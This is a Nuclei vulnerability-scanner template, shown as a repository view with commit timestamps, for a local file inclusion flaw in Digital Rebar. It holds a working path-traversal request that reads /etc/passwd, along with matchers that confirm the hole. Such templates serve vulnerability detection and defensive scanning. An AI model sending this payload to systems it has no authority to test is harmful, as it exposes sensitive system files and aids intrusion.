nuclei-templates/vulnerabilities/other/digitalrebar-traversal.yaml

40 lines
1006 B
YAML
Raw Normal View History

2022-05-24 06:48:27 +00:00
id: digitalrebar-traversal
info:
name: Digital Rebar - Local File Inclusion
2022-05-24 06:48:27 +00:00
author: c-sh0
2022-05-28 17:29:19 +00:00
severity: high
description: Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.
2022-05-24 06:48:27 +00:00
reference:
- https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html
- https://docs.rackn.io/en/latest/doc/release.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2022-05-24 06:48:27 +00:00
tags: lfi,rackn,digitalrebar
requests:
- method: GET
path:
- "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: word
part: header
words:
- 'X-Drp-Sha256sum:'
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22